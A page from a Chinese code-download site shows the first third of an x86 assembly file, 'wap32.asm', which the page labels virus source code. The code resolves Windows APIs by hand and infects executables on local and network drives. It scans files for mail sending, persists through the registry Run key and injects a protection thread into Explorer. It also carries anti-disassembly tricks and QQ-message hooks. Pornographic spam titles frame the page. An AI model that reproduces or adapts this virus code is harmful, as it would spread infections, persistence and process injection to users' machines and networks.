亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? wap32.asm

?? 一個病毒源代碼
?? ASM
?? 第 1 頁 / 共 3 頁
字號:
include wap32.inc

ApiAddressList struc
  ;Kernel32.DLL
  KnlLoadLibraryA          dd ?
  KnlCreateMutexA          dd ?
  KnlGetLastError          dd ?
  KnlGetCommandLineA       dd ?
  KnlWinExec               dd ?   
  KnlGetDriveTypeA         dd ?
  KnlSetCurrentDirectoryA  dd ?
  KnlFindFirstFileA        dd ?
  KnlFindNextFileA         dd ? 
  KnlFindClose		   dd ?
  KnlSetFileAttributesA    dd ?
  KnlSetFileTime           dd ? 
  KnlLOpen                 dd ?
  KnlLRead                 dd ?
  KnlLWrite                dd ?
  KnlLSeek                 dd ?
  KnlLClose		   dd ?  
  KnlSleep		   dd ?
  KnlRegisterServiceProc   dd ?
  KnlGetCurrentProcessId   dd ?
  KnlOpenProcess	   dd ?
  KnlWriteProcessMemory	   dd ?
  KnlCreateRemoteThread	   dd ?
  KnlCreateKernelThread	   dd ?
  KnlCloseHandle	   dd ?
  KnlWaitForSingleObject   dd ?
  KnlVirtualAllocEx	   dd ?
  KnlGetSystemDirectoryA   dd ?
  KnlLCreat		   dd ?
  KnlCreateThread	   dd ?
  KnlTerminateThread	   dd ?
  KnlWideCharToMultiByte   dd ?
  KnlGetComputerNameA	   dd ?
  KnlGetSystemTime	   dd ?
  ;User32.DLL
  UserGetWinThreadProcId   dd ?
  UserFindWindowA	   dd ?
  UserMessageBoxA	   dd ?
  UserGetWindow		   dd ?
  UserSendMessageA	   dd ?
  UserwsprintfA		   dd ?
  ;AdvApi32.DLL
  AdvRegOpenKeyA	   dd ?
  AdvRegSetValueExA	   dd ?
  AdvRegQueryValueExA	   dd ?
  AdvRegNotifyChange	   dd ?
  ;Mpr.DLL
  MprWNetOpenEnumA	   dd ?
  MprWNetEnumResourceA     dd ?
  MprWNetCloseEnum         dd ?
  ;WSock32.DLL
  WsWSAStartup		   dd ?
  WsWSACleanup		   dd ?
  Wssend		   dd ?
  Wshtons		   dd ?
  Wsgethostbyname	   dd ?
  Wsconnect		   dd ?
  Wssocket		   dd ?
  Wsclosesocket		   dd ?
  Wsrecv		   dd ?
  ;VirusData		
  DataKnlMzHeader	   dd ? 
  DataVirusSize		   dd ?
  DataRemoteThread	   dd ?
  

ApiAddressList ends

MAX_BUFF_SIZE=1000h
VirusSize=offset VirusEnd-offset Start+10h

extrn MessageBoxA: proc
extrn ExitProcess: proc

.586p
.model flat,stdcall

.data

Start:
	pushad
	call	VirusEnd
NeedDecode:
	mov	esi,[esp+4*8]
	call	PushRunError	;得到意外繼續執行地址
	popad
	PushXXXCode db 68h	;JmpOldApp
	OldEntryRVA dd offset Exit
	ret
	db	0e9h		;靜態反匯編干擾

PushRunError:
	pop	ecx
	call	SetSehFrame
FindKernel32:		
	and	esi,0fffff000h	;得到Kernel.PELoader代碼位置(不精確)
LoopFindKernel32:
	sub	esi,1000h 
	cmp	word ptr[esi],'ZM'	;搜索EXE文件頭
	jnz	short LoopFindKernel32
GetPeHeader:
	movzx	edi,word ptr[esi.PEHeaderOffset]
	add	edi,esi	
	mov	ebp,[edi.fhExportsRVA]
	add	ebp,esi		;得到輸出函數表
	mov	ebx,[ebp.etExportNameList]
	add	ebx,esi		;得到輸出函數名表
	xor	eax,eax		;函數序號計數
	mov	edx,esi		;暫存Kernel32模塊句柄
LoopFindApiStr:
	add	ebx,04
	inc	eax		;增加函數計數
	mov	edi,[ebx]
	add	edi,edx		;得到一個Api函數名字符串
	call	PushStrGetProcAddress
	db	'GetProcAddress',0
PushStrGetProcAddress:
	pop	esi		;得到Api名字字符串
	xor	ecx,ecx
	mov	cl,15		;GetProcAddress串大小
	cld
	rep	cmpsb  
	jnz	short LoopFindApiStr  
	mov	esi,edx 
	mov	ebx,[ebp.etExportOrdlList]
	add	ebx,esi		;取函數序號地址列表
	movzx	ecx,word ptr[ebx+eax*2]
	mov	ebx,[ebp.etExportAddrList]
	add	ebx,esi		;得到Kernel32函數地址列表
	mov	ebx,[ebx+ecx*4]
	add	ebx,esi		;計算GetProcAddress函數地址

	sub	esp,size ApiAddressList+10h	;在堆棧中存放API的地址
	mov	edi,esp
	
	mov	[esp.DataKnlMzHeader],esi

	call	PushKnlApiStr	
LoopRelocKnlApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位Kernel32.dll Api
	loop	LoopRelocKnlApi

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushUser32Str
	db	'USER32.DLL',0
PushUser32Str:
	call	eax
	mov	esi,eax	
	call	PushUser32ApiStr
LoopRelocUser32Api:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位User32.dll Api
	loop	LoopRelocUser32Api
	
	mov	eax,[esp.KnlLoadLibraryA]
	call	PushAdvApi32Str
	db	'ADVAPI32.DLL',0
PushAdvApi32Str:
	call	eax
	mov	esi,eax
	call	PushAdvApiStr
LoopRelocAdvApi32Api:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位ADVAPI32.dll Api
	loop	LoopRelocAdvApi32Api

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushMprStr
	db	'MPR.DLL',0
PushMprStr:
	call	eax
	mov	esi,eax
	call	PushMprApiStr
LoopRelocMprApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位MPR.dll Api
	loop	LoopRelocMprApi

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushWsStr
	db	'WSOCK32.DLL',0
PushWsStr:
	call	eax
	mov	esi,eax
	call	PushWsApiStr
LoopRelocWsApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位MPR.dll Api
	loop	LoopRelocWsApi

	mov	esi,esp		;函數調用列表指針,以后固定不變

	call	PushMutexName
	db	'ChineseHacker-2',0
PushMutexName:  
	call	[esi.KnlCreateMutexA],0,0
	call	[esi.KnlGetLastError]
	or	eax,eax		;檢查病毒是否已經運行
	jz	short ExecOldProgram
	int	3;		;人工引發異常執行原程序,JmpOldApp
	db	0e9h		;靜態反匯編干擾

ExecOldProgram:			;加載自己,運行老程序
	call	[esi.KnlGetCommandLineA]
	call	[esi.KnlWinExec],eax,L 01

	call	PushNextRunErrorProc;保護注冊表與創建遠程線程
	mov	esi,esp		;意外繼續執行地址
StartScan:	
	call	PushScanErrorProc;搜索本地與遠程目錄文件
	mov	esi,esp		;恢復函數調用列表指針
	call	[esi.KnlSleep],1000*60;*10
	jmp	short StartScan	;休眠10分鐘重新搜索文件
	db	0e9h		;靜態反匯編干擾
PushScanErrorProc:
	pop	ecx
	call	SetSehFrame

ScanExeFile:
	call	GetFoundFileCallBackAddr
	lea	eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]	
	mov	[edx],eax	;設置找到文件的處理程序

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到目錄的處理程序

	call	EnumLogDrive	;搜索本地文件,并傳染病毒

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到NET目錄的處理程序

	call	EnumNetResource	;搜索遠程文件,并傳染病毒	

ScanMailFile:
	call	GetFoundFileCallBackAddr
	lea	eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
	mov	[edx],eax	;設置找到文件的處理程序

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到目錄的處理程序
	call	EnumLogDrive	;搜索本地文件,發郵件

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到NET目錄的處理程序

	call	EnumNetResource	;搜索遠程文件,發郵件

CheckRemoteAndWait:
	mov	eax,[esi.DataRemoteThread]
	call	[esi.KnlWaitForSingleObject],eax,1000*60;
	cmp	eax,-1		;睡眠8小時
	jnz	short AddWordToQQMsg
NeedCreateRemote:
	push	esi
	call	PushWaitErrorProc
	pop	esi
	call	GetNetSendMsg
	db	'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
	pop	eax
	call	[esi.KnlWinExec],eax,0
	jmp	short CheckRemoteAndWait
PushWaitErrorProc:
	pop	ecx
	call	SetSehFrame

	call	ProcessProtect	;重新啟動遠程線程保護/內帶意外
	db	0e9h		;靜態反匯編干擾

AddWordToQQMsg:	
	call	GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
	pop	edi

	mov	eax,[esi.UserFindWindowA];填寫線程用API
	mov	[edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.UserGetWindow]
	mov	[edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.UserSendMessageA]
	mov	[edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.KnlSleep]
	mov	[edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax

	lea	eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
	push	eax		;創建QQ附加消息線程
	call	[esi.KnlCreateThread],0,0,eax,eax,0,esp
	mov	ebx,eax		;保證SendQQMsg線程活動10分鐘
	pop	eax

CheckRemoteAndWaitAgain:
	mov	eax,[esi.DataRemoteThread]
	call	[esi.KnlWaitForSingleObject],eax,1000*60;
	push	eax		;睡眠10分鐘
	call	[esi.KnlTerminateThread],ebx,0
	pop	eax
	cmp	eax,-1
	jz	short NeedCreateRemoteAgain
	int	3;		;人工意外,繼續搜索文件
	db	0e9h		;靜態反匯編干擾
NeedCreateRemoteAgain:
	push	esi
	call	PushWaitErrorProcAgain
	pop	esi
	jmp	short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
	pop	ecx
	call	SetSehFrame

	call	ProcessProtect	;重新啟動遠程線程保護/內帶意外
	db	0e9h		;靜態反匯編干擾

PushNextRunErrorProc:		;保護注冊表與創建遠程線程
	pop	ecx
	call	SetSehFrame

RegisterProtect:
	sub	esp,100h	;構造病毒路徑
	call	BuildVirusPathInStack,esp
	mov	edi,esp
	
	call	[esi.KnlLCreat],edi,10h
	cmp	eax,-1h		;創建獨占文件
	jz	short OptRegister
	mov	ebx,eax	
	call	UnzipVirusToFile;解壓PE文件
	call	[esi.KnlLSeek],ebx,0,0
	call	FixPeFile,ebx	;傳染病毒給PE文件,不關閉文件,防刪除
	mov	edi,esp		;把病毒設置為:隱藏+系統+只讀
	call	[esi.KnlSetFileAttributesA],edi,7h
	
OptRegister:	
	push	eax
	push	esp
	call	PushRegKeyStr
	db	'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
	call	[esi.AdvRegOpenKeyA],080000002h
	pop	ebx
	mov	eax,esp
	call	PushKeyNameStr	;修改注冊表,自動Run項目
	db	'Runonce',0
PushKeyNameStr:
	pop	ecx
	call	[esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h

	call	GetVirusBaseInEdi	
GetVirusBaseInEdi:
	pop	edi		;得到病毒位置參照偏移量

	mov	eax,[esi.AdvRegQueryValueExA];填寫API地址
	mov	[edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
	mov	eax,[esi.AdvRegSetValueExA]
	mov	[edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
	mov	eax,[esi.AdvRegNotifyChange]
	mov	[edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax

	lea	eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]		
	push	eax		;創建注冊表監視線程
	call	[esi.KnlCreateThread],0,0,eax,ebx,0,esp
	pop	eax		;不關閉注冊表句柄,監視線程續用

ProcessProtect:			;創建遠程線程
	xor	eax,eax
	mov	[esi.DataRemoteThread],eax

	sub	esp,100h
	call	BuildVirusPathInStack,esp

	call	GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
	pop	edi		;得到病毒位置參照偏移量

	mov	eax,[esi.KnlOpenProcess];填寫API地址
	mov	[edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
	mov	eax,[esi.KnlWaitForSingleObject]
	mov	[edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
	mov	eax,[esi.KnlWinExec]
	mov	[edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax	

	mov	eax,[esi.KnlRegisterServiceProc]
	or	eax,eax		;依靠函數RehSvrProc來假定操作系統類別9x/2k
	jz	short Process2kProtect	

Process9xProtect:
	call	eax,L 0,L 1	;在Win9x下先隱藏本進程,一級保護

	mov	edx,[esi.DataKnlMzHeader]
	movzx	ebx,word ptr[edx.PEHeaderOffset]
	add	ebx,edx
	mov	ecx,[ebx.fhObjectTable00.otRVA]
	mov	ebp,[ebx.fhHeaderSize]
	sub	ecx,ebp
	cmp	ecx,200h
	jb	short Process9xProtectEnd
	add	ebp,edx		;查詢Knl空間

	lea	edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]	
	call	MoveDataToKnl,edx,ebp,ProcessProtectProcSize
	lea	ecx,[ebp+ProcessProtectProcSize]
	mov	edx,esp		;復制線程代碼數據到Kernel32.dll
	call	MoveDataToKnl,edx,ecx,100h

	call	[esi.KnlGetCurrentProcessId]
	push	eax		;創建Kernel線程,未公開函數
	call	[esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
	mov	[esi.DataRemoteThread],eax
	pop	eax		;啟動進程保護線程
	
	call	[esi.KnlSleep],500

Process9xProtectEnd:
	int	3		;人工異常
	db	0e9h		;反匯編干擾	

Process2kProtect:		;填寫API地址
	call	[esi.UserFindWindowA],0,0
	push	eax		;找Explorer進程/或者Top窗口程序
	call	[esi.UserGetWinThreadProcId],eax,esp   
	call	[esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
	or	eax,eax		;打開該進程
	jz	short Process2kProtectEnd
	mov	ebx,eax
	call	[esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
	or	eax,eax
	jz	short Close2kHandle
	mov	ebp,eax		;分配遠程空間

	lea	edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
	push	eax
	call	[esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
	pop	eax		;復制代碼到遠程地址空間
	cmp	eax,ProcessProtectProcSize
	jnz	short Close2kHandle
		
	mov	edx,esp
	lea	ecx,[ebp+ProcessProtectProcSize]
	push	eax
	call	[esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
	call	[esi.KnlGetCurrentProcessId]
	call    [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
	mov	[esi.DataRemoteThread],eax
	pop	eax		;啟動進程保護線程	

Close2kHandle:
	call	[esi.KnlCloseHandle],ebx
	call	[esi.KnlSleep],500

Process2kProtectEnd:
	int	3		;人工異常
	db	0e9h		;反匯編干擾
	
PushKnlApiStr:	;:ecx=函數名個數	
	pop	eax		;彈出返回地址
	mov	ecx,esp
	call	PushKnlApiStr33
	db	'GetSystemTime',0
PushKnlApiStr33:
	call	PushKnlApiStr32
	db	'GetComputerNameA',0
PushKnlApiStr32:
	call	PushKnlApiStr31
	db	'WideCharToMultiByte',0
PushKnlApiStr31:
	call	PushKnlApiStr30
	db	'TerminateThread',0
PushKnlApiStr30:
	call	PushKnlApiStr29
	db	'CreateThread',0
PushKnlApiStr29:
	call	PushKnlApiStr28
	db	'_lcreat',0
PushKnlApiStr28:
	call	PushKnlApiStr27
	db	'GetSystemDirectoryA',0
PushKnlApiStr27:
	call	PushKnlApiStr26
	db	'VirtualAllocEx',0
PushKnlApiStr26:
	call	PushKnlApiStr25
	db	'WaitForSingleObject',0
PushKnlApiStr25:
	call	PushKnlApiStr24
	db	'CloseHandle',0
PushKnlApiStr24:
	call	PushKnlApiStr23
	db	'CreateKernelThread',0
PushKnlApiStr23:
	call	PushKnlApiStr22
	db	'CreateRemoteThread',0
PushKnlApiStr22:
	call	PushKnlApiStr21
	db	'WriteProcessMemory',0
PushKnlApiStr21:

	call	PushKnlApiStr20
	db	'OpenProcess',0
PushKnlApiStr20:
	call	PushKnlApiStr19
	db	'GetCurrentProcessId',0
PushKnlApiStr19:
	call	PushKnlApiStr18
	db	'RegisterServiceProcess',0
PushKnlApiStr18:    
	call	PushKnlApiStr17
	db	'Sleep',0
PushKnlApiStr17:    
	call	PushKnlApiStr16
	db	'_lclose',0
PushKnlApiStr16:  
	call	PushKnlApiStr15
	db	'_llseek',0
PushKnlApiStr15:  
	call	PushKnlApiStr14
	db	'_lwrite',0
PushKnlApiStr14:  
	call	PushKnlApiStr13
	db	'_lread',0
PushKnlApiStr13:  
	call	PushKnlApiStr12
	db	'_lopen',0
PushKnlApiStr12:
	call	PushKnlApiStr11
	db	'SetFileTime',0
PushKnlApiStr11:
	call  PushKnlApiStr10
	db	'SetFileAttributesA',0
PushKnlApiStr10:
	call	PushKnlApiStr09
	db	'FindClose',0
PushKnlApiStr09:
	call	PushKnlApiStr08
	db	'FindNextFileA',0
PushKnlApiStr08:
	call	PushKnlApiStr07
	db	'FindFirstFileA',0
PushKnlApiStr07:
	call	PushKnlApiStr06
	db	'SetCurrentDirectoryA',0
PushKnlApiStr06:
	call	PushKnlApiStr05
	db	'GetDriveTypeA',0
PushKnlApiStr05:
	call	PushKnlApiStr04
	db	'WinExec',0
PushKnlApiStr04:
	call	PushKnlApiStr03
	db	'GetCommandLineA',0
PushKnlApiStr03:
	call	PushKnlApiStr02
	db	'GetLastError',0
PushKnlApiStr02:
	call	PushKnlApiStr01
	db	'CreateMutexA',0
PushKnlApiStr01:
	call	PushKnlApiStr00
	db	'LoadLibraryA',0
PushKnlApiStr00:
	sub	ecx,esp
	shr	ecx,2
	jmp	eax
	db	0e9h		;靜態反匯編干擾

PushUser32ApiStr:
	pop	eax
	mov	ecx,esp
	call	PushUser32ApiStr05
	db	'wsprintfA',0
PushUser32ApiStr05:   
	call	PushUser32ApiStr04
	db	'SendMessageA',0
PushUser32ApiStr04:   
	call	PushUser32ApiStr03
	db	'GetWindow',0
PushUser32ApiStr03:   
	call	PushUser32ApiStr02
	db	'MessageBoxA',0

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
天天影视涩香欲综合网| 日韩精品一区二区三区三区免费 | 国产一区999| 日本va欧美va瓶| 日日夜夜免费精品视频| 性感美女久久精品| 日本视频中文字幕一区二区三区| 亚洲动漫第一页| 午夜精品123| 日本不卡一区二区三区| 日韩国产精品大片| 精品在线一区二区| 懂色av中文一区二区三区| 成人在线视频首页| 在线视频一区二区三| 欧美午夜免费电影| 日韩欧美国产系列| 欧美激情艳妇裸体舞| 亚洲精品日日夜夜| 免费高清在线视频一区·| 精品一区二区三区影院在线午夜| 国产91精品免费| 在线观看一区不卡| 日韩欧美中文字幕制服| 国产亚洲综合av| 一区二区三区小说| 麻豆国产精品视频| 成人av在线网| 4hu四虎永久在线影院成人| 精品卡一卡二卡三卡四在线| 国产精品丝袜91| 香港成人在线视频| 高清日韩电视剧大全免费| 日本高清免费不卡视频| 亚洲精品一区二区三区99| 国产精品色在线| 日韩高清一区二区| 99精品视频一区| 日韩欧美久久久| 亚洲图片欧美激情| 蜜桃av一区二区在线观看| 99精品久久久久久| 久久综合资源网| 亚洲成人av免费| 成人免费视频caoporn| 欧美一区二区久久| 夜夜夜精品看看| 国产91精品一区二区麻豆亚洲| 91精品国产91热久久久做人人| 亚洲人成亚洲人成在线观看图片| 美女视频一区二区三区| 在线视频你懂得一区二区三区| 国产午夜精品一区二区三区视频 | 欧美浪妇xxxx高跟鞋交| 久久九九全国免费| 免费看欧美女人艹b| 欧美网站大全在线观看| 久久久av毛片精品| 玖玖九九国产精品| 欧美日韩中文国产| 亚洲精品视频自拍| www.欧美色图| 亚洲国产精品激情在线观看| 久久电影网电视剧免费观看| 这里只有精品电影| 日日摸夜夜添夜夜添精品视频 | 色婷婷综合久久久中文一区二区 | 日韩不卡一区二区三区| 色哟哟一区二区三区| 国产精品色噜噜| 国产成人亚洲综合色影视| 日韩三级av在线播放| 免费在线看成人av| 欧美mv和日韩mv国产网站| 青青草97国产精品免费观看 | 久久嫩草精品久久久久| 久久国产综合精品| www久久精品| 国产精品亚洲第一| 国产精品天天看| 91视视频在线直接观看在线看网页在线看 | 久久99热这里只有精品| 99re这里只有精品视频首页| 国产精品无遮挡| 99久久精品情趣| 亚洲激情图片一区| 欧美视频一二三区| 日韩电影在线免费看| 日韩欧美亚洲国产精品字幕久久久 | 国产激情一区二区三区| 日韩免费观看高清完整版| 久久精品国产澳门| 日韩亚洲欧美一区| 国产精品一区二区91| 欧美国产精品一区| 91国内精品野花午夜精品| 亚洲成av人片一区二区| 日韩欧美国产一二三区| 国产.欧美.日韩| 亚洲国产精品久久人人爱 | 国产经典欧美精品| 亚洲美女免费在线| 91精品国产色综合久久久蜜香臀| 国产在线一区观看| 亚洲精品一二三| 日韩区在线观看| 99精品久久免费看蜜臀剧情介绍 | 欧美一区二区免费视频| 国产伦精品一区二区三区在线观看| 欧美国产日韩在线观看| 欧美视频在线观看一区| 国模冰冰炮一区二区| 亚洲精品第1页| 日韩一级黄色片| 97aⅴ精品视频一二三区| 亚洲一区成人在线| 久久久99精品久久| 欧美日韩高清在线| 国产精品一二三区在线| 亚洲一卡二卡三卡四卡五卡| 欧美精品一区二区三区蜜桃 | 国产精品麻豆欧美日韩ww| 欧美性猛片aaaaaaa做受| 国产成人在线视频网址| 亚洲午夜久久久| 国产精品盗摄一区二区三区| 宅男在线国产精品| 欧洲人成人精品| 成人福利在线看| 国产一区二区精品久久| 亚洲成人在线观看视频| 国产精品久久久久久户外露出 | 亚洲综合免费观看高清在线观看| 亚洲精品在线免费播放| 欧美日韩在线亚洲一区蜜芽| 9l国产精品久久久久麻豆| 久久91精品久久久久久秒播| 亚洲一区免费视频| 一区二区三区欧美激情| 亚洲欧美在线aaa| 国产精品久久久久影院| 国产欧美一区二区在线观看| 欧美va亚洲va| 精品国产凹凸成av人网站| 欧美一区二区三区免费大片| 欧美日韩亚洲综合一区| 在线观看视频欧美| 欧美日韩大陆在线| 欧美欧美欧美欧美| 欧美人与z0zoxxxx视频| 欧美久久久久久蜜桃| 欧美人体做爰大胆视频| 欧美高清精品3d| 欧美色视频一区| 91精品国产综合久久小美女| 精品少妇一区二区三区免费观看| 日韩一区二区精品| 日韩一区二区三区电影在线观看| 69堂成人精品免费视频| 日韩欧美一二区| 久久综合九色综合97婷婷| 精品久久久久香蕉网| 欧美激情资源网| 国产精品美女一区二区| 18欧美乱大交hd1984| 一区二区三区视频在线看| 亚洲一级二级在线| 青椒成人免费视频| 国产精品影视在线| 91网上在线视频| 欧美人妖巨大在线| 精品国产三级电影在线观看| ww久久中文字幕| 亚洲视频一二区| 亚洲成人一区在线| 国产精品综合在线视频| av亚洲精华国产精华精华| 在线视频欧美精品| 精品三级在线观看| 亚洲色欲色欲www| 亚洲在线成人精品| 精品中文字幕一区二区| www.日本不卡| 欧美一级夜夜爽| 亚洲国产精品精华液2区45| 亚洲在线视频网站| 国产成人精品一区二| 色激情天天射综合网| 日韩免费看网站| 亚洲欧洲一区二区三区| 日韩精品电影在线观看| 粉嫩绯色av一区二区在线观看| 色综合亚洲欧洲| 久久久另类综合| 亚洲成人一区在线| 91片黄在线观看| 欧美精品一区二区在线播放| 综合久久给合久久狠狠狠97色| 男女男精品视频网| 欧美在线视频不卡|